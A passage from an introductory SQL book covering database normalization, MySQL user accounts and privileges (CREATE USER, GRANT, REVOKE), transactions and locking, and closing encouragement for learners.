design. Normalization produces more efficient databases that give the
SQL software application an edge in performing effective queries and
maintaining data integrity at all times.
Definition and Importance of Database Normalization
Basically, normalization is the process of designing a database model to
reduce data redundancy by breaking large tables into smaller, more
manageable ones in which the same types of data are grouped together. What is
the importance of database normalization? Normalizing a database ensures
that the pieces of information stored are well organized, easily managed and
always accurate, with no unnecessary duplication. Merging the data from the
CUSTOMER_TBL table with the ORDER_TBL table results in a
large table that is not normalized:
If you look closely at this table, there is data redundancy in the rows for the
customer named Kathy Ale. Always remember to minimize data redundancy
to save disk or storage space and to prevent users from getting confused by
the amount of information the table contains. There is also a possibility that,
of several tables containing such customer information, one table may not have
the same matching information as another. How would a user verify
which one is correct? Also, if certain customer information needs to be
updated, you are required to update the data in all of the database tables
where it appears. This wastes time and effort in managing the
entire database system.
Forms of Normalization
A normal form measures the degree to which a database has been
normalized, and there are three common normal forms:
First Normal Form (1NF)
The first normal form, or 1NF, aims to divide a given set of data into logical
units or tables of related information. Each table is assigned a
primary key, a specified column that uniquely identifies the table's
rows. Every cell should hold a single value, and each row of a table
refers to a unique record of information. The columns, which refer to the
attributes of the table's information, are given unique names and contain the
same type of data values. Moreover, the columns and the rows are arranged in
no particular order.
Let us add a new table named Employee_TBL to the database that contains
basic information about the company's employees:
Based on the diagram above, the entire company database was divided into
two tables, Employee_TBL and Customer_TBL, with EmployeeID and
CustomerID as their respective primary keys. By doing
this, database information is easier to read and manage than
one big table consisting of many columns and rows. The data
values stored in the Employee_TBL table only refer to pieces of information
describing the company's employees, while those that pertain exclusively to
the company's customers are contained in the Customer_TBL table.
Second Normal Form (2NF)
The second normal form, or 2NF, is the next step after you have successfully
applied the first normal form. This process focuses on the functional
dependencies in the database, which describe the relationships existing
between attributes. When one attribute determines the value of
another, a functional dependency exists between them. Thus, you will
store data values from the Employee_TBL and Customer_TBL tables
that are only partly dependent on the assigned primary keys in separate tables.
In the figure above, the attributes that are only partly dependent on the
EmployeeID primary key have been removed from Employee_TBL and are
now stored in a new table called Employee_Salary_TBL. The attributes that
were kept in the original table are completely dependent on the table's
primary key: for every record of last name, first name, address
and contact number there is a corresponding unique employee ID.
In the Employee_Salary_TBL table, by contrast, a particular employee ID does
not point to a unique employee position or salary rate. It is possible that
more than one employee holds the same position
(EmpPosition) and receives the same pay rate (Payrate) or bonus
(Bonus).
Third Normal Form (3NF)
In the third normal form, or 3NF, pieces of information that are not
dependent on the primary key at all should also be separated from the
table. Looking back at Customer_TBL, two attributes are totally
independent of the CustomerID primary key: JobPosition (job position)
and JobDescription (job position description). Regardless of who the
customer is, any job position will have the same duties and responsibilities.
Thus, the two attributes are separated into another table called
Position_TBL.
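The 3NF split above can be sketched end to end. The following is an illustrative example using SQLite via Python's sqlite3 module; the table names follow the chapter, but the sample data and the Flat_TBL starting table are invented. The key point is that JobDescription depends on JobPosition, not on CustomerID, so it moves to its own table and is stored only once:

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Denormalized: the position description is repeated for every customer row.
conn.execute("""CREATE TABLE Flat_TBL (
    CustomerID INTEGER, Name TEXT, JobPosition TEXT, JobDescription TEXT)""")
conn.executemany("INSERT INTO Flat_TBL VALUES (?, ?, ?, ?)", [
    (1, 'Kathy Ale', 'Buyer', 'Purchases stock'),
    (2, 'John Doe',  'Buyer', 'Purchases stock'),   # duplicated description
    (3, 'Sue Ray',   'Clerk', 'Handles paperwork'),
])

# 3NF: move the position attributes into their own table...
conn.execute("""CREATE TABLE Position_TBL (
    JobPosition TEXT PRIMARY KEY, JobDescription TEXT)""")
conn.execute("""INSERT INTO Position_TBL
                SELECT DISTINCT JobPosition, JobDescription FROM Flat_TBL""")
# ...and keep only a reference to the position in the customer table.
conn.execute("""CREATE TABLE Customer_TBL (
    CustomerID INTEGER PRIMARY KEY, Name TEXT,
    JobPosition TEXT REFERENCES Position_TBL(JobPosition))""")
conn.execute("""INSERT INTO Customer_TBL
                SELECT CustomerID, Name, JobPosition FROM Flat_TBL""")

# Each description is now stored once; a join reassembles the original view.
rows = conn.execute("""SELECT c.Name, p.JobDescription
                       FROM Customer_TBL c
                       JOIN Position_TBL p USING (JobPosition)
                       ORDER BY c.CustomerID""").fetchall()
print(rows)
```

Updating a job description now means changing one row in Position_TBL instead of every matching customer row.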
Drawbacks of Normalization
Though database normalization offers a number of advantages in
organizing, simplifying and maintaining the integrity of databases, you still
need to consider the following disadvantages:
- Creating more tables to spread out data increases the need to join tables,
and such tasks become more tedious, which makes the database harder to
conceptualize.
- Instead of real and meaningful data, database tables will contain lines of
codes.
- Query processing becomes more difficult as the database model grows more
complex.
- Database performance is reduced, or becomes slower, as the normal form
type progresses.
- A normalized database requires much more CPU and memory usage.
- To execute the normalization process efficiently, the user needs the
appropriate knowledge and skills in optimizing databases. Otherwise, the
design will be filled with inconsistencies.
Chapter 16 Database Security and Administration
MySQL has an integrated, advanced access control and privilege system that
enables the creation of extensive access rules for user activities and
efficiently prevents unauthorized users from accessing the database
system.
There are two phases in the MySQL access control system when a user
connects to the server:
- Connection verification: every user is required to have a valid
username and password when connecting to the server.
Moreover, the host the user connects from must match the
host recorded in the MySQL grant tables.
- Request verification: after a connection has been successfully
established, for every query executed by the user MySQL
verifies whether the user has the privileges required to run that
specific query. MySQL is capable of checking user privileges
at the database, table, and column level.
The MySQL installer automatically generates a database called mysql. The
mysql database comprises five main grant tables. These tables can be
manipulated indirectly using statements such as GRANT and REVOKE:
- user: contains columns for user accounts and global
privileges. MySQL accepts or rejects a connection from
a host based on this table. A privilege granted in the
user table applies to all the databases on the server.
- db: contains database-level privileges. MySQL
uses the db table to determine which database a user
can access and from which host. These privileges
apply to the particular database and all the
objects available in that database, such as stored procedures,
views, triggers, tables, and many more.
- tables_priv and columns_priv: contain privileges
at the table and column level. A privilege granted in the
tables_priv table applies only to that particular
table, while a privilege granted in the
columns_priv table applies only to a particular column.
- procs_priv: contains privileges for stored functions and
procedures.
MySQL uses the tables listed above to regulate MySQL database server
privileges. It is essential to understand these tables before
implementing your own dynamic access control system.
Creating User Accounts
In MySQL, a user account specifies both the user who is privileged to connect
to the database server and the host from which the user builds that
connection. Accordingly, every user account consists of a username and a host
name separated by the @ character.
For instance, if the admin user connects to the server from localhost, the
user account is named admin@localhost. The admin
user is then allowed to connect to the server only from localhost, not from a
remote host, which gives the server higher security.
Moreover, by combining the username and host, several accounts with the
same name can be configured that connect from distinct
hosts and are given distinct privileges, as needed.
All user accounts are stored in the user grant table of the mysql
database.
Using MySQL CREATE USER Statement
The CREATE USER statement is used to set up new user accounts on the
MySQL server, as shown in the syntax below:
CREATE USER usr_acnt IDENTIFIED BY paswrd;
In the syntax above, the CREATE USER clause is followed by the name
of the user account in username@hostname format.
In the IDENTIFIED BY clause, the user password is indicated. The
password is specified in plain text; MySQL encrypts
the password before the user account is saved in the user table.
For instance, the statement below creates a new user dbadmn that connects
to the server from localhost with the password 'Safe':
CREATE USER dbadmn@lclhst
IDENTIFIED BY 'Safe';
If you would like to check the permissions given to a user account, you can
run the statement below:
SHOW GRANTS FOR dbadmn@lclhst;
+------------------------------------------+
| Grants for dbadmn@lclhst                 |
+------------------------------------------+
| GRANT USAGE ON *.* TO 'dbadmn'@'lclhst'  |
+------------------------------------------+
1 row in set (0.00 sec)
The *.* in the output above indicates that the dbadmn user is
allowed to log into the server only and does not have any other
access privileges.
Bear in mind that the portion before the dot (.) represents the database and
the portion after the dot represents the table, for example, db.table.
The percent (%) wildcard can be used as shown in the syntax below
to allow a user to create a connection from any host:
CREATE USER supradmn@'%'
IDENTIFIED BY 'safe';
The percent (%) wildcard behaves the same way here as in the LIKE
operator. For example, to enable the msqladmn user account to connect to
the server from any subdomain of the mysqhost.something host, the statement
below can be used:
CREATE USER msqladmn@'%.mysqhost.something'
IDENTIFIED BY 'safe';
It should also be noted here that another wildcard, the underscore (_), can be
used in the CREATE USER statement.
If the host name portion is omitted from a user account, the server
treats it as '%' and allows the user to connect from any host. For
instance, the syntax below generates a new remoteuser account that
is allowed to connect from any host:
CREATE USER remoteuser;
To view the privileges given to the remoteuser account, you can use the
syntax below:
SHOW GRANTS FOR remoteuser;
+------------------------------------------+
| Grants for remoteuser@%                  |
+------------------------------------------+
| GRANT USAGE ON *.* TO 'remoteuser'@'%'   |
+------------------------------------------+
1 row in set (0.00 sec)
It is necessary to remember that the single quotation marks (' ') in the syntax
above are particularly significant if the user name or host name contains
special characters such as underscore or percent.
If you inadvertently quote the whole account as one string, such as
'usrname@hstname', the server will create a new user whose name is
usrname@hstname and enable it to connect from any host, which is probably
not what you intended.
The syntax below, for instance, creates a new account api@lclhst that can
connect to the server from any host:
CREATE USER 'api@lclhst';
SHOW GRANTS FOR 'api@lclhst';
+------------------------------------------+
| Grants for api@lclhst@%                  |
+------------------------------------------+
| GRANT USAGE ON *.* TO 'api@lclhst'@'%'   |
+------------------------------------------+
1 row in set (0.01 sec)
If you accidentally create a user that already exists in the database, MySQL
issues an error. For instance, suppose the syntax below is used to create the
remoteuser account again:
CREATE USER remoteuser;
The error message below will be displayed on your screen:
ERROR 1396 (HY000): Operation CREATE USER failed for 'remoteuser'@'%'
Note that the CREATE USER statement only creates the new user; it does
not grant any privileges. The GRANT statement is used to give access
privileges to users.
Updating User Passwords
Prior to altering a MySQL user account password, the concerns listed below
should be taken into consideration:
- The user account whose password you would like to modify.
- The applications being used with the user account whose password you
would like to modify. If the password is changed without altering the
connection string of the applications using that user account, those
applications will no longer be able to connect to the database server.
MySQL offers a variety of statements that can be used to alter a user's
password, such as the UPDATE, SET PASSWORD, and GRANT
USAGE statements.
Let's explore some of these statements!
Using UPDATE Statement
The UPDATE statement can be used to update the user table in the mysql
database. After executing the UPDATE statement, you must also execute the
FLUSH PRIVILEGES statement to reload the privileges from the grant
tables.
Assume that you would like to change the password of the dbadmn user,
which connects from localhost, to fish. It can be accomplished by
executing the query below:
USE mysql;
UPDATE user
SET password = PASSWORD('fish')
WHERE user = 'dbadmn' AND
host = 'lclhst';
FLUSH PRIVILEGES;
Using SET PASSWORD Statement
The SET PASSWORD statement uses the user@host format to identify the
account. If you would like to modify the password of some other
user's account, you are required to have the UPDATE privilege on the mysql
database.
With the SET PASSWORD statement, the FLUSH PRIVILEGES statement
does not need to be executed in order to reload privileges from the grant
tables of the mysql database.
The syntax below can be used to alter the dbadmn user account
password:
SET PASSWORD FOR 'dbadmn'@'lclhst' = PASSWORD('bigfish');
Using ALTER USER Statement
Another method to update the user password is the ALTER USER statement
with the IDENTIFIED BY clause. For instance, the query below can be
executed to change the password of the dbadmn user to littlefish:
ALTER USER dbadmn@lclhst IDENTIFIED BY 'littlefish';
***USEFUL TIP***
If you need to change the password of the root account, the server must be
stopped and started back up without grant table validation (for example,
using the --skip-grant-tables option).
Granting User Privileges
When a new user account is created, no access privileges are afforded to
the user by default. The GRANT statement must be used to grant privileges
to user accounts. The syntax of this statement is shown below:
GRANT priv [, priv], ... ON priv_level
TO usr [IDENTIFIED BY pswrd]
[REQUIRE tls_optn]
[WITH [GRANT OPTION | resrce_optn]];
- In the syntax above, we start by specifying one or more privileges following
the GRANT clause. If you would like to give the user account more than one
privilege at the same time, each privilege must be separated by a comma.
(The list of potential privileges that may be granted to a user account is
given in the table below.)
- After that, you must indicate the privilege level, which determines the level
at which the privileges are applied. The privilege levels supported by
MySQL are global (*.*), database (database.*), table (database.table) and
column.
- Next, you need to indicate the user that is to be granted the privileges. If the
indicated user already exists on the server, the GRANT statement modifies
its privileges; otherwise, a new user account is created by the GRANT
statement. The IDENTIFIED BY clause is not mandatory and enables the
creation of a new password for the user.
- Thereafter, you can indicate whether the user needs to connect to the
database via secured connections.
- At last, the WITH GRANT OPTION clause can be added. It is not
mandatory, but it enables the user to grant to, or revoke from, other users
the privileges that were given to their own account. Moreover, the WITH
clause can also be used to assign resources of the MySQL database server,
for example, putting a limit on the number of connections or statements that
can be used by the user per hour. In shared environments like MySQL
shared hosting, the WITH clause is extremely useful.
Note that to use the GRANT statement, your own user account must already
have the GRANT OPTION privilege as well as the privileges you are
looking to grant to other users. If the read_only system variable has been
enabled, executing the GRANT statement requires the SUPER privilege.
The privileges that can be granted, together with the levels (global, database,
table, column) at which each applies, are listed below:
ALL: grants all of the privileges at the specified access level, except
GRANT OPTION.
ALTER (global, database, table): allows users to use the ALTER TABLE
statement.
ALTER ROUTINE (global, database): allows users to alter and drop stored
routines.
CREATE (global, database, table): allows users to create databases and
tables.
CREATE ROUTINE (global, database): allows users to create stored
routines.
CREATE TABLESPACE (global): allows users to create, modify or remove
tablespaces and log file groups.
CREATE TEMPORARY TABLES (global, database): allows users to create
temporary tables with the CREATE TEMPORARY TABLE statement.
CREATE USER (global): allows users to use the CREATE USER, DROP
USER, RENAME USER, and REVOKE ALL PRIVILEGES statements.
CREATE VIEW (global, database, table): allows users to create or update
views.
DELETE (global, database, table): allows users to use the DELETE
statement.
DROP (global, database, table): allows users to remove databases, tables
and views.
EVENT (global, database): enables the use of events for the Event
Scheduler.
EXECUTE (global, database, table): allows users to execute stored
routines.
FILE (global): allows users to read files in the database directories.
GRANT OPTION (global, database, table): allows users to grant to or
revoke from other users the privileges they themselves hold.
INDEX (global, database, table): allows users to create or drop indexes.
INSERT (global, database, table, column): allows users to use the INSERT
statement.
LOCK TABLES (global, database): allows users to use LOCK TABLES on
tables on which they have the SELECT privilege.
PROCESS (global): allows users to view all processes with the SHOW
PROCESSLIST statement.
PROXY: enables users to proxy as other users.
REFERENCES (global, database, table, column): allows users to create
foreign keys.
RELOAD (global): allows users to use the FLUSH operation.
REPLICATION CLIENT (global): allows users to query where master or
slave servers are.
REPLICATION SLAVE (global): allows replication slaves under the user to
read binary log events from the master.
SELECT (global, database, table, column): allows users to use the SELECT
statement.
SHOW DATABASES (global): allows users to view all databases.
SHOW VIEW (global, database, table): allows users to use the SHOW
CREATE VIEW statement.
SHUTDOWN (global): allows users to use the mysqladmin shutdown
command.
SUPER (global): allows users to use other administrative operations such as
CHANGE MASTER TO, KILL, PURGE BINARY LOGS, SET GLOBAL,
and mysqladmin commands.
TRIGGER (global, database, table): allows users to use TRIGGER
operations.
UPDATE (global, database, table, column): allows users to use the
UPDATE statement.
USAGE: equivalent to no privilege.
EXAMPLE
More often than not, the CREATE USER statement will be used to first
create a new user account and then the GRANT statement is used to assign
the user privileges.
For instance, a new super user account can be created by executing the
CREATE USER statement given below:
CREATE USER super@localhost IDENTIFIED BY 'dolphin';
In order to check the privileges granted to the super@localhost user, the
query below with SHOW GRANTS statement can be used.
SHOW GRANTS FOR super@localhost;
+-------------------------------------------+
| Grants for super@localhost |
+-------------------------------------------+
| GRANT USAGE ON *.* TO `super`@`localhost` |
+-------------------------------------------+
1 row in set (0.00 sec)
Now, if you wanted to assign all privileges to the super@localhost user, the
query below with GRANT ALL statement can be used.
GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION;
The ON *.* clause refers to all databases and the objects within those
databases. The WITH GRANT OPTION clause enables super@localhost to
assign privileges to other user accounts.
If the SHOW GRANTS statement is used again at this point then it can be
seen that privileges of the super@localhost's user have been modified, as
shown in the syntax and the result set below:
SHOW GRANTS FOR super@localhost;
+----------------------------------------------------------------------+
| Grants for super@localhost |
+----------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT
OPTION |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
Now, assume that you want to create a new user account with all the server
privileges in the classicmodels sample database. You can accomplish this by
using the query below:
CREATE USER auditor@localhost IDENTIFIED BY 'whale';
GRANT ALL ON classicmodels.* TO auditor@localhost;
Using only one GRANT statement, various privileges can be granted to a
user account. For instance, to create a user account with the privilege
of executing SELECT, UPDATE and DELETE statements against the
classicmodels database, the query below can be used:
CREATE USER rfc IDENTIFIED BY 'shark';
GRANT SELECT, UPDATE, DELETE ON classicmodels.* TO rfc;
Revoking User Privileges
You use the MySQL REVOKE statement to revoke privileges from a user
account. MySQL enables the withdrawal of one or more privileges, or even
all of the previously granted privileges, of a user account.
The query below can be used to revoke particular privileges from a user
account:
REVOKE privilege_type [(column_list)]
[, privilege_type [(column_list)]]...
ON [object_type] privilege_level
FROM user [, user]...
In the syntax above, we start by specifying, after the REVOKE keyword, a
list of all the privileges that need to be revoked from a user account. You
might recall that multiple privileges listed in one statement must be separated
by commas. Then, in the ON clause, we indicate the privilege level at which
these privileges will be revoked. Lastly, we indicate in the FROM clause the
user account whose privileges will be revoked.
Bear in mind that your own user account must have the GRANT
OPTION privilege as well as the privileges you want to revoke from
other user accounts.
You will be using the REVOKE statement as shown in the syntax below, if
you are looking to withdraw all privileges of a user account:
REVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user]…
It is important to remember that, to be able to execute the REVOKE ALL
statement, you are required to have the global CREATE USER privilege or
the UPDATE privilege on the mysql database.
You will be using REVOKE PROXY clause as shown in the query below, in
order to revoke proxy users:
REVOKE PROXY ON user FROM user [, user]...
You define a proxy user as a validated user within any MySQL environment
who has the capabilities of impersonating another user. As a result, the proxy
user is able to attain all the privileges granted to the user that it
is impersonating.
The best practice dictates that you should first check what privileges have
been assigned to the user by executing the syntax below with the statement
SHOW GRANTS, prior to withdrawing the user's privileges:
SHOW GRANTS FOR user;
EXAMPLE
Assume that there is a user named rfd with SELECT, UPDATE and DELETE
privileges on the classicmodels sample database, and you would like to
revoke the UPDATE and DELETE privileges from the rfd user. To
accomplish this, you can execute the queries below.
To start with, we will check the user's privileges using the SHOW GRANTS
statement below:
SHOW GRANTS FOR rfd;
GRANT SELECT, UPDATE, DELETE ON 'classicmodels'.* TO 'rfd'@'%'
At this point, the UPDATE and DELETE privileges can be revoked from the
rfd user using the query below:
REVOKE UPDATE, DELETE ON classicmodels.* FROM rfd;
Next, the privileges of the rfd user can be checked with the SHOW
GRANTS statement:
SHOW GRANTS FOR rfd;
GRANT SELECT ON 'classicmodels'.* TO 'rfd'@'%'
Now, if you wanted to revoke all the privileges from the rfd user, you can use
the query below:
REVOKE ALL PRIVILEGES, GRANT OPTION FROM rfd;
To verify that all the privileges from the rfd user have been revoked, you will
need to use the query below:
SHOW GRANTS FOR rfd;
GRANT USAGE ON *.* TO 'rfd'@'%'
Remember, the USAGE privilege simply means that the user has no
privileges in the server.
Resulting Impact of the REVOKE Query
The impact of MySQL REVOKE statement relies primarily on the level of
privilege granted to the user account, as explained below:
- Modifications to global privileges take effect only when the user connects
to the MySQL server in a subsequent session after the REVOKE query has
executed. The modifications do not apply to users already connected to the
server while the REVOKE statement is being executed.
- Modifications to database privileges apply only after a USE statement has
been executed following the execution of the REVOKE query.
- Table and column privilege modifications apply to all queries executed
after the modifications have been made with the REVOKE statement.
Chapter 17 Real-World Uses
We have seen how we can use SQL in isolation. For instance, we went
through different ways to create tables and what operations you can perform
on those tables to retrieve the required answers. If you only wish to learn how
SQL works, this approach is fine, but it is not how SQL is used
in practice.
The syntax of SQL is close to English, but it is not an easy language to
master. Most computer users are not familiar with SQL, and you can assume
that there will always be individuals who do not understand how to work
with it. When a question about a database comes up, a user will almost never
type a SELECT statement to answer that question. Application developers
and systems analysts are probably the only people who are comfortable with
SQL, and even they do not make a career out of typing queries into a
database to retrieve information. They instead develop applications that write
queries.
If you intend to reuse the same operation, you should ensure that you never
have to rebuild that operation from scratch. Instead, write an application to
do the job for you. When SQL is used inside an application, it works a little
differently.
SQL IN AN APPLICATION
SQL is not a complete programming language on its own. If you want to use
SQL in an application, you must combine it with a procedural language such
as FORTRAN, Pascal, C, Visual Basic, C++, COBOL, or Java. Because of
how it is structured, SQL has particular strengths and weaknesses, and a
procedural language, being structured differently, has different strengths and
weaknesses. When you combine the two languages, each can compensate for
the weaknesses of the other.
You can build a powerful application when you combine SQL and a
procedural language. This application will have a wide range of capabilities.
We use an asterisk to indicate that we want to include all the columns of a
table in a query. If the table has many columns, typing an asterisk saves a lot
of time. However, do not use the asterisk when you are writing a program in
a procedural language. After the application is written, you may add a
column to the table or delete one that is no longer necessary. When you do
this, you change the meaning of the asterisk. If the application uses the
asterisk, it may retrieve different columns from the ones it thinks it is
getting.
Such a schema change will not affect the existing program until it is
recompiled to make some change or fix a bug, at which point the effect of
the asterisk wildcard expands to the table's current columns. The application
could then stop working in a way that is hard to identify during debugging.
Therefore, when you build an application, refer to column names explicitly
and avoid using the asterisk.
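The failure mode described above can be demonstrated concretely. Below is a hypothetical sketch using SQLite via Python's sqlite3 module (the customer table and its columns are invented): code that unpacks the result of SELECT * by position breaks as soon as a column is added, while an explicit column list keeps working.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customer (id INTEGER, name TEXT)")
conn.execute("INSERT INTO customer VALUES (1, 'Kathy Ale')")

# Fragile: position-based unpacking of SELECT * output.
cid, name = conn.execute("SELECT * FROM customer").fetchone()

# The schema later gains a column...
conn.execute("ALTER TABLE customer ADD COLUMN phone TEXT")

# ...and the same SELECT * now returns three values, breaking the unpacking.
try:
    cid, name = conn.execute("SELECT * FROM customer").fetchone()
except ValueError as e:
    print("broken:", e)  # too many values to unpack

# Robust: the explicit column list still returns exactly what the code expects.
cid, name = conn.execute("SELECT id, name FROM customer").fetchone()
print(cid, name)  # 1 Kathy Ale
```

In a compiled procedural language the breakage surfaces at recompile time rather than immediately, exactly as the text describes, which makes it even harder to trace.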
Since replacing paper files stored in physical file cabinets, relational
databases have broken new ground. Relational database management
systems, or RDBMS for short, are used anywhere information is stored or
retrieved, such as a login account for a website or articles on a blog.
Speaking of which, they also provided a new platform for, and helped
leverage, websites like Wikipedia, Facebook, Amazon, and eBay. Wikipedia,
for instance, contains articles, links, and images, all of which are stored in a
database behind the scenes. Facebook holds much of the same type of
information, and Amazon holds product information and payment methods,
and even handles payment transactions.
With that in mind, banks also use databases for payment transactions and to
manage the funds within someone’s bank account. Other industries, like
retail, use databases to store product information, inventory, sales
transactions, price, and so much more. Medical offices use databases to store
patient information, prescription medication, appointments, and other
information.
To expand further, using the medical office as an example, a database
permits numerous users to connect to it at once and interact with its
information. Since it uses a network to manage connections, virtually
anyone with access to the database can reach it from just about anywhere in
the world.
These types of databases have also given way to new jobs and have even
expanded the tasks and responsibilities of current jobs. Those who are in
finance, for instance, now have the ability to run reports on financial data;
those in sales can run reports for sales forecasts, and so much more!
In practical situations, databases are often used by multiple users at the same
time. A database that can support many simultaneous users has a high level of
concurrency. Concurrency, however, can lead to lost data or reads of data that
no longer exists. SQL manages these situations by using transactions to
enforce atomicity, consistency, isolation, and durability. These elements
comprise the properties of transactions. A transaction is a sequence of T-SQL
statements that combine logically to complete an operation which, if only
partially applied, would introduce inconsistency to a database.
Atomicity acts as a container for the statements in a transaction: either every
statement succeeds and the whole transaction completes, or, if any part of the
transaction is unable to process fully, the entire operation fails and all partial
changes roll back to the prior state.
Transactions take place once a row-level or page-level lock is in place.
Locking prevents other users' modifications from taking effect on the locked
object; it is akin to reserving a spot within the database in which to make
changes. If another user attempts to change data under lock, their process
fails, and an alert communicates that the object in question is locked and
unavailable for modification.
Transforming data within transactions allows a database to move from one
consistent state to a new consistent state. It's critical to understand that
transactions can modify more than one table at a time. Changing data in a
primary key field without simultaneously updating the foreign key fields that
reference it creates inconsistent data that SQL does not accept, so transactions
are a big part of changing related data in multiple tables all at once.
Transactional processing also enforces isolation, the property that prevents
concurrent transactions from interfering with each other. If two transactions
attempt to modify the same data at the same time, only one of them will
succeed, and a transaction's changes are invisible to others until it completes.
Whichever transaction completes first is accepted; once it commits, the user
whose transaction failed sees the newly committed information and must
decide whether their modification is still required.
Finally, durability ensures that if the system fails, for example during a power
outage, the effects of incomplete transactions roll back, while any transaction
that completed before the failure is retained. The database engine
accomplishes rollbacks by using the transaction log to identify the previous
state of the data and restore it to that earlier point in time.
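As a short T-SQL sketch of atomicity (the Accounts table and its columns are hypothetical, invented purely for illustration), a transfer between two accounts can be wrapped in a single transaction so that either both updates apply or neither does:

```sql
-- Hypothetical Accounts(AccountID, Balance) table, for illustration only.
BEGIN TRANSACTION;

BEGIN TRY
    UPDATE Accounts SET Balance = Balance - 100 WHERE AccountID = 1;
    UPDATE Accounts SET Balance = Balance + 100 WHERE AccountID = 2;
    COMMIT TRANSACTION;   -- both updates succeeded: make them durable
END TRY
BEGIN CATCH
    ROLLBACK TRANSACTION; -- any failure: undo all partial changes (atomicity)
END CATCH;
```

If the second UPDATE fails for any reason, the ROLLBACK in the CATCH block returns the first account's balance to its prior state, so the database never shows money leaving one account without arriving in the other.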
There are a few variations of a database lock, and various properties of locks
as well. Lock properties include mode, granularity, and duration. The easiest
to define is duration, which specifies the time interval over which the lock is
applied. Lock modes define different types of locking, and these modes are
determined by the type of resource being locked. A shared lock allows data
to be read while the row or page lock is in effect. Exclusive locks are for
performing data manipulation (DML): they provide exclusive use of a row or
page for the execution of data modification. Exclusive locks cannot be held
concurrently; while data is being actively modified, the page is inaccessible
to all other users, regardless of permissions. Update locks are placed on a
single object and allow data to be read while the update lock is in place. They
also allow the database engine to determine whether an exclusive lock is
necessary once a transaction that modifies the object is committed. This is
only true if no other locks are active on the object in question at the time of
the update lock. The update lock is the best of both worlds, allowing reads
and DML transactions to take place at the same time until the actual update is
committed to the row or table. These lock types describe page-level locking,
but there are other types beyond the scope of this text.
The final property of a lock, granularity, specifies to what degree a resource
is unavailable. Rows are the smallest object available for locking, leaving the
rest of the database available for manipulation. Pages, indexes, tables,
extents, or the entire database are also candidates for locking. An extent is a
physical allocation of data, and the database engine will employ this lock if a
table or index grows and more disk space is needed. Problems can arise from
locks, such as lock escalation or deadlock, and we highly encourage readers
to pursue a deeper understanding of how these function.
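In Microsoft SQL Server, a lock mode can also be requested explicitly with a table hint. The sketch below (again using a hypothetical Accounts table) asks for an update lock while reading, so other readers are not blocked, but the row can later be upgraded to an exclusive lock for the modification:

```sql
BEGIN TRANSACTION;

-- UPDLOCK takes an update lock on the rows read; HOLDLOCK keeps it
-- until the transaction ends. Shared readers may still proceed, but no
-- one else can acquire an update or exclusive lock on these rows.
SELECT Balance
FROM Accounts WITH (UPDLOCK, HOLDLOCK)
WHERE AccountID = 1;

UPDATE Accounts SET Balance = Balance - 100 WHERE AccountID = 1;

COMMIT TRANSACTION;
```

This mirrors the "best of both worlds" behavior described above: reads continue while the update lock is held, and the exclusive lock is taken only at the moment of the actual UPDATE.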
It is useful to mention that Oracle developed an extension to SQL that
allows for procedural instruction using SQL syntax. This is called PL/SQL,
and as we discussed at the beginning of the book, SQL on its own is unable to
provide procedural instruction because it is a non-procedural language. The
extension changes this and expands the capabilities of SQL. PL/SQL code is
used to create and modify advanced SQL constructs such as functions, stored
procedures, and triggers. Triggers allow SQL to perform specified operations
automatically when defined conditions occur. They are an advanced piece of
SQL functionality, and they often work in conjunction with logging or alerts
to notify principals or administrators when errors occur. SQL by itself lacks
the control structures for looping, branching, and decision-making that are
available in programming languages such as Java. The Oracle Corporation
developed PL/SQL to meet the needs of its database product, which offers
similar functionality to other database management systems but is not limited
to non-procedural operations.
Previously, user-defined functions were mentioned but not defined. Plain
SQL does not cover the creation of user-defined functions, but with a
procedural extension such as T-SQL or PL/SQL it is possible to create
functions that fit neatly within the same scope as system-defined functions. A
user-defined function (UDF) is a programming construct that accepts
parameters, performs a task (which may itself make use of system-defined
functions), and returns a result. UDFs can be tricky because Microsoft SQL
Server also allows stored procedures, which can often accomplish the same
task as a user-defined function. A stored procedure is a batch of SQL
statements that can be executed in multiple ways and contains centralized
data-access logic. Both of these features are important when working with
SQL in production environments.
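As a minimal T-SQL sketch (the function name and its logic are invented for illustration), a scalar user-defined function is created once and can then be called anywhere a system-defined function could appear:

```sql
-- A scalar UDF that converts a Celsius temperature to Fahrenheit.
CREATE FUNCTION dbo.CelsiusToFahrenheit (@celsius DECIMAL(9,2))
RETURNS DECIMAL(9,2)
AS
BEGIN
    RETURN (@celsius * 9.0 / 5.0) + 32.0;
END;
GO

-- Used like any built-in function:
SELECT dbo.CelsiusToFahrenheit(100.00);  -- 212.00
```

The same conversion could also be written as a stored procedure with an OUTPUT parameter; the UDF form is preferable here because the result can be used inline in a SELECT, WHERE, or computed column, just like a system-defined function.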
Conclusion
Well, we have come to the end of our journey for now. That was the absolute
basics of SQL programming: everything you need to know to get off to the
successful start you deserve. As you have seen, SQL is somewhat
complicated; it certainly isn’t the easiest of languages to learn! It will require
your full attention if you are to understand the basics but, once you have
learned them, you will find that it is very easy to build on them and move on
to the next stage.
If something doesn’t make sense to you, don’t be afraid to repeat it; go over it
and practice the examples until you have a better understanding. The only
thing I will say here is don’t spend too long on any one problem – you won’t
grasp it any quicker and are more likely to go backwards. Working with SQL
all day long at work is one thing; learning it is quite another. The brain will
only take in so much information before it can’t go any further, so don’t
overdo it.
Although there is much to learn, SQL can be a very simple language to use
with a database. By taking advantage of the tools in this book, you can
successfully find your way around any database. It is important to keep in
mind that not all statements work the same in every database system, and the
differences between versions are noted in the book.
Although this has been written with examples of clients or inventory charts,
there are many uses for databases. The examples given are not to be taken
completely literally. You can adapt the information in this book to fit
whatever your needs are for any database.
There is plenty to learn when it comes to SQL, but with practice and a good
foundation, you can be as successful as you decide to be with any database.
Just as the English language has many rules to be followed, the same applies
to SQL. By taking the time to thoroughly learn the language, many things are
achievable with a database. Refer back to the information in this book any
time you are stumped on something you are working on.
Although it can be a complex challenge, patience and practice will help you
successfully learn SQL. By remembering the basic commands and rules of
SQL, you will avoid the issues that trip up many people who use it. It is a lot
of information to take in, so take it as it comes. Go to the practical tools you
need for whatever you are trying to achieve through the database. When
presented with an obstacle or complex assignment, refer to the tools that will
clear up what you need. Take time to fully analyze what is before you while
also trying to focus on one thing at a time.
Keep an open and simple mind when moving forward and you will keep any
issues from becoming more complicated than they need to be. As mentioned,
SQL can be a simple thing to learn; you just need to take the time to fully
